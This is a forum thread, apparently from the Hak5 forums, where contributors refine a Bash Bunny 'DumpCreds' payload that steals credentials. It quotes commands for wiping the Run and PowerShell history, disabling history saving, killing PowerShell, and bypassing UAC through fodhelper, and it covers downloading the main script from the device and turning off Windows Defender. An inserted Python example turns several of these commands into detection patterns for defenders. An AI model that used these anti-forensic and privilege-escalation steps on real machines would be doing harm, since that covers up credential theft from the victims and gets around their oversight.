Hak5 Forums


Ok, further improvements:

A: Cleared History of "Run" (Win+R) by payload.txt

B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1

I would like to move it into the Main payload.txt, but Bunny is making problems:

He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol)

Also I had problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1).

Maybe you can get it implemented in that line, so we leave no trace even in case of unsuccessful loading.

https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

23 minutes ago, Feuermagier said:

Ok, further improvements:

A: Cleared History of "Run" (Win+R) by payload.txt

B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1

I would like to move it into the Main payload.txt, but Bunny is making problems:

He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol)

Also I had problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1).

Maybe you can get it implemented in that line, so we leave no trace even in case of unsuccessful loading.

https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

Code for clearing "Run" history was already in main.ps1

.........

# Empty Run input field (clear the Win+R MRU list in the registry)
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
........

Added the code to clear Powershell history to main.ps1

We should avoid too many "Q GUI r" commands, because it's visible.


I did some testing, and the "powershell -w h" showed up in Run after completion, so I added it to payload.txt.

We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r.

13 minutes ago, Feuermagier said:

I did some testing, and the "powershell -w h" showed up in Run after completion, so I added it to payload.txt.

We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r.

Q GUI didn't work for me. Q GUI r does.

Now we have only the taskkill powershell command in the powershell history.

59 minutes ago, qdba said:

Q GUI didn't work for me. Q GUI r does.

Now we have only the taskkill powershell command in the powershell history.

Maybe we can send the taskkill and the delete in a single, stacked command.

2 minutes ago, Feuermagier said:

Maybe we can send the taskkill and the delete in a single, stacked command.

Got it ...

With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in Powershell is switched off. So I set it at the beginning of the script and delete the history file at the end.

Just now, qdba said:

Got it ...

With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in Powershell is switched off. So I set it at the beginning of the script and delete the history file at the end.

Why save nothing if we delete anyway?

I thought more of killing powershell and deleting the file in a double command, so that it's clear.

Also we have to switch history back on, because the user will permanently have no history, which is suspicious.

1 minute ago, Feuermagier said:

Why save nothing if we delete anyway?

I thought more of killing powershell and deleting the file in a double command, so that it's clear.

Also we have to switch history back on, because the user will permanently have no history, which is suspicious.

It cannot be done in the line with the main.ps1 call because......

.......

1. A first Powershell task will be started for the input of the registry command for the UAC bypass.

Then the fodhelper opens a second Powershell task in admin mode. The first Powershell task can be closed after the fodhelper thing.

The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS task.
A third PS task is opening, waiting for the HTTP server to come up, and downloads the main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line.
If you remove the history between the main.ps1 call and the exit command it's too fast: the main.ps1 is still running and creates new history events.

The main.ps1 is ready when the EOF file has been created in the loot dir. (payload.txt: line 95)

The computer can be cleaned after this event.

so...

1. The history must be switched off at the very first beginning, before the registry command of the UAC bypass.
Considerations: does the Set-PSReadlineOption -HistorySaveStyle SaveNothing command switch off the history globally? If so... good... if not, set a marker in the history file.

2. Do all the stuff.....

3. Problem....
Switch history on after the EOF is written. Maybe this can be done by switching ATTACKMODE to HID and doing all the things in a GUI (r?)
or
start a DOS command line at the end of main.ps1 to do all the cleanup (switch on command line, kill powershell, copy back a saved history file, delete all lines from marker to end or.... / and... other things).

Will sleep after that..
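The history-hiding steps discussed in the posts above (SaveNothing, deleting ConsoleHost_history.txt, clearing RunMRU, the stacked taskkill plus delete) are exactly what a defender would hunt for in PowerShell script block logs (Event ID 4104). The following is an added detection example written for this thread, not code from the DumpCreds payload; the log records and the `scan_script_blocks`/`assess` helpers are my own constructed illustration.

```python
import re

# Indicator patterns for the anti-forensic actions named in the thread.
# Applied to the ScriptBlockText of Event ID 4104 records (or to lines of a
# collected ConsoleHost_history.txt). Patterns are constructed for this example.
INDICATORS = {
    "psreadline_history_disabled": re.compile(
        r"Set-PSReadLineOption\b.*-HistorySaveStyle\s+SaveNothing", re.I),
    "console_history_deleted": re.compile(
        r"\b(Remove-Item|rm|del|ri|erase)\b[^;]*ConsoleHost_history\.txt", re.I),
    "runmru_cleared": re.compile(
        r"Remove-ItemProperty\b.*Explorer\\RunMRU", re.I),
    "powershell_taskkill": re.compile(
        r"\btaskkill\b.*\bpowershell", re.I),
}

# Constructed sample records: (EventRecordID, ScriptBlockText). Not real telemetry.
SAMPLE_RECORDS = [
    (101, r"Get-ChildItem C:\Users"),
    (102, r"Set-PSReadlineOption -HistorySaveStyle SaveNothing"),
    (103, r"Get-Process | Where-Object CPU -gt 100"),
    (104, r"taskkill /F /IM powershell.exe; rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"),
    (105, r"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"),
]


def scan_script_blocks(records):
    """Return (record_id, indicator_name) for every record matching an indicator.
    A single stacked command can yield several hits (record 104 above)."""
    hits = []
    for record_id, text in records:
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((record_id, name))
    return hits


def assess(records):
    """Summarise one session: which distinct indicators appeared, and whether
    two or more did, which is the disable-act-wipe sequence the thread
    describes rather than an isolated admin housekeeping command."""
    seen = sorted({name for _, name in scan_script_blocks(records)})
    return {"indicators": seen, "suspicious": len(seen) >= 2}


if __name__ == "__main__":
    for record_id, name in scan_script_blocks(SAMPLE_RECORDS):
        print(f"record {record_id}: {name}")
    print(assess(SAMPLE_RECORDS))
```

Script block logging captures the command even when the history file is later deleted, so pairing this with a file-deletion source such as Sysmon Event ID 23 on ConsoleHost_history.txt gives a second, independent signal.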
13 minutes ago, Feuermagier said:

I don't think Powershell scripts are creating history.

Or were you already deleting those?

I must check if the command for switching off the history is still in the history file after execution. Can't do it now. Have no powershell here.

The result will give me the route for the rest.


Hmm, I keep seeing déjà vu when I read through that main.ps1 :-P

Anyway, I may be touching this script a lot to make some changes. I see some improvements. I need to mess with the fodhelper bypass technique first though to see what is going on. I know the Windows 7 Eventviewer bypass technique but only read about the fod one.

I just have...ideas. If the clouds of work break this week, I will spin something out. Where is the original repo so I can just contribute there? I will let you push it up to Hak5 if any changes I make meet your liking.


Added multiple UAC modes.

Set the variable UAC_MODE in payload.txt:

UAC_MODE=1  # Fodhelper UAC
UAC_MODE=0  # Standard UAC mode

Just beta (works on my Windows 10, not tested on 7 yet).

14 hours ago, UnLo said:

Still only works on fw 1.1?

1.1+: any firmware, 1.1 or more.

8 hours ago, m40295 said:

1.1+: any firmware, 1.1 or more.

Yep. My bad. Completely missed the (+).


I got it working on Windows 10 Pro edition. However, it only worked when the firewall was off; with it on it was unable to get an IP. Any idea? Is there a payload that can turn Windows Defender off?


Hello,

I am on the latest fw and have an odd issue. When I plug in the BB it turns green for a few seconds like it's booting, then does nothing at all if I have the switch selected for DumpCreds. I would think that the LED light would come on, but it never does. I have tested a lot of other payloads and never have seen this happen. Does anyone have any ideas?

Thanks!

On 4/16/2018 at 2:20 PM, Spoonman said:

I got it working on Windows 10 Pro edition. However, it only worked when the firewall was off; with it on it was unable to get an IP. Any idea? Is there a payload that can turn Windows Defender off?

You can easily make a simple add-on to have powershell turn it off and back on at the end.
